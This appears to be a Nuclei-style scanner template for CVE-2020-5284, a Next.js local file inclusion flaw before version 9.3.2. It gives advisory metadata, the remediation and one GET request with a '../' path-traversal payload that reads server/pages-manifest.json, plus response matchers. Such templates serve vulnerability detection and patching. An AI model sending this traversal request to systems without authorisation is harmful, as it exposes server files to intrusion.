id: CVE-2020-5284 info: name: Next.js <9.3.2 - Local File Inclusion author: rootxharsh,iamnoooob,dwisiswant0 severity: medium description: Next.js versions before 9.3.2 are vulnerable to local file inclusion. An attacker can craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. remediation: This issue is fixed in version 9.3.2. reference: - https://github.com/zeit/next.js/releases/tag/v9.3.2 - https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj - https://nvd.nist.gov/vuln/detail/CVE-2020-5284 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2020-5284 cwe-id: CWE-22,CWE-23 epss-score: 0.00152 epss-percentile: 0.51328 cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zeit product: next.js tags: cve,cve2020,nextjs,lfi http: - method: GET path: - "{{BaseURL}}/_next/static/../server/pages-manifest.json" matchers-condition: and matchers: - type: word part: header words: - "application/json" - type: regex part: body regex: - '\{"/_app":".*?_app\.js"' - type: status status: - 200 # digest: 490a0046304402201024249fc9e5a3ec8203dc46e79c67782b92f45b260045607bc38208254b42740220225cd2c3116ba8d8ceff9e241bfd835a864eb4d7d6430ade75b96ead8bb1133a:922c64590222798bb761d5b6d8e72950